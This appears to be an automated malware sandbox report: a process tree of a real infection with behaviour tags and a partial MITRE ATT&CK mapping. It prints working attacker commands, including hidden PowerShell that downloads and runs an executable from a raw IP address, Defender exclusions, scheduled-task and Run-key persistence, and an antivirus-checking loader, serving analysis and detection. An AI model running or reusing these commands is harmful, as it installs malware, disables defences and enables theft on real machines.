    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392
      - C:\Users\Admin\AppData\Local\TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
        
        "C:\Users\Admin\AppData\Local\TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10317940121\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2388
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 2
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5360
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3100
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5808
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3656
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "F7UTJmaQjc0" /tr "mshta \"C:\Temp\hWiDGqXAM.hta\"" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:3120
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "C:\Temp\hWiDGqXAM.hta"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:5848
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2664
      - C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6136
- - C:\Users\Admin\AppData\Local\Temp\10318410101\OkH8IPF.exe
    "C:\Users\Admin\AppData\Local\Temp\10318410101\OkH8IPF.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3584
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2872
- - C:\Users\Admin\AppData\Local\Temp\10318420101\y0u3d_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10318420101\y0u3d_003.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:4916
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:6036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1724
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      PID:5832
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5880
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:4312
      - C:\Users\Admin\AppData\Local\Temp\{ed30a513-6577-40c1-b076-2cafc8ea8ef7}\5ad03fa0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{ed30a513-6577-40c1-b076-2cafc8ea8ef7}\5ad03fa0.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        6⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:8488
        
        C:\Users\Admin\AppData\Local\Temp\{a811e992-2892-40df-973c-edc75858d066}\bab10adf.exe
        
        C:/Users/Admin/AppData/Local/Temp/{a811e992-2892-40df-973c-edc75858d066}/\bab10adf.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        7⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:7884
- - C:\Users\Admin\AppData\Local\Temp\10318430101\tK0oYx3.exe
    "C:\Users\Admin\AppData\Local\Temp\10318430101\tK0oYx3.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2752
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:3456
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\10318440101\zx4PJh6.exe
    "C:\Users\Admin\AppData\Local\Temp\10318440101\zx4PJh6.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4556
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:2332
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:9220
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:9236
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:9568
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:9584
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 440824
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:9772
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Architecture.wmv
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1052
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Offensive" Inter
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:10288
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:10392
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:10740
    - - C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
        
        Organizations.com h
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:10984
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10984 -s 896
        6⤵
        Program crash
        
        PID:6688
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4924
- - C:\Users\Admin\AppData\Local\Temp\10318450101\cUpXaxB.exe
    "C:\Users\Admin\AppData\Local\Temp\10318450101\cUpXaxB.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:8124
- - C:\Users\Admin\AppData\Local\Temp\10318460101\Jq0hGDZ.exe
    "C:\Users\Admin\AppData\Local\Temp\10318460101\Jq0hGDZ.exe"
    3⤵
    - Executes dropped EXE
    PID:11348
  - - C:\Windows\system32\reg.exe
      reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s
      4⤵
      Modifies registry key
      PID:11432
  - - C:\Windows\system32\reg.exe
      reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 1042" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10318460101\Jq0hGDZ.exe\" /f
      4⤵
      Adds Run key to start application
      Modifies registry key
      PID:11544
  - - C:\Windows\system32\reg.exe
      reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 1042" /t REG_BINARY /d 020000000000000000000000 /f
      4⤵
      Modifies registry key
      PID:11672
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 1042" /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:11788
- - C:\Users\Admin\AppData\Local\Temp\10318550101\831adba42a.exe
    "C:\Users\Admin\AppData\Local\Temp\10318550101\831adba42a.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:12124
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:13152
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffebb56dcf8,0x7ffebb56dd04,0x7ffebb56dd10
        5⤵
        
        PID:13196
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2008,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1976 /prefetch:2
        5⤵
        
        PID:10752
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2248,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2260 /prefetch:3
        5⤵
        
        PID:10708
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2384 /prefetch:8
        5⤵
        
        PID:10508
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3232 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1368
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3376 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:10232
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4412 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:9956
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4368,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3204 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:9856
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4868,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4852 /prefetch:8
        5⤵
        
        PID:9724
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4956,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4960 /prefetch:8
        5⤵
        
        PID:9668
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4712,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5052 /prefetch:8
        5⤵
        
        PID:9188
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5444,i,1654006614753998522,4597912058690450258,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5452 /prefetch:8
        5⤵
        
        PID:9088
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:7800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2ac,0x7ffeac1ef208,0x7ffeac1ef214,0x7ffeac1ef220
        5⤵
        
        PID:7644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2008,i,3362779037208190778,15641362165395639249,262144 --variations-seed-version --mojo-platform-channel-handle=2004 /prefetch:2
        5⤵
        
        PID:7208
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2132,i,3362779037208190778,15641362165395639249,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:3
        5⤵
        
        PID:7188
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2584,i,3362779037208190778,15641362165395639249,262144 --variations-seed-version --mojo-platform-channel-handle=2596 /prefetch:8
        5⤵
        
        PID:1968
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3580,i,3362779037208190778,15641362165395639249,262144 --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6808
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3548,i,3362779037208190778,15641362165395639249,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6796
- - C:\Users\Admin\AppData\Local\Temp\10318560101\f230181bbb.exe
    "C:\Users\Admin\AppData\Local\Temp\10318560101\f230181bbb.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5060
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:12736
- - C:\Users\Admin\AppData\Local\Temp\10318570101\9ccc466db6.exe
    "C:\Users\Admin\AppData\Local\Temp\10318570101\9ccc466db6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:9972
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10318570101\9ccc466db6.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:12544
- - C:\Users\Admin\AppData\Local\Temp\10318580101\7571af87e1.exe
    "C:\Users\Admin\AppData\Local\Temp\10318580101\7571af87e1.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4496
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10318580101\7571af87e1.exe"
      4⤵
      Executes dropped EXE
      PID:4552
- - C:\Users\Admin\AppData\Local\Temp\10318590101\laf6w_001.exe
    "C:\Users\Admin\AppData\Local\Temp\10318590101\laf6w_001.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:3456
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:4256
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6176
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      PID:2080
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe" ""
        5⤵
        
        PID:7124
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        
        PID:7160
- - C:\Users\Admin\AppData\Local\Temp\10318600101\cdf5f3198a.exe
    "C:\Users\Admin\AppData\Local\Temp\10318600101\cdf5f3198a.exe"
    3⤵
    PID:6516
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:6904
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:6936

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 10984 -ip 10984
1⤵
PID:6672

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:10636

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:8708

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

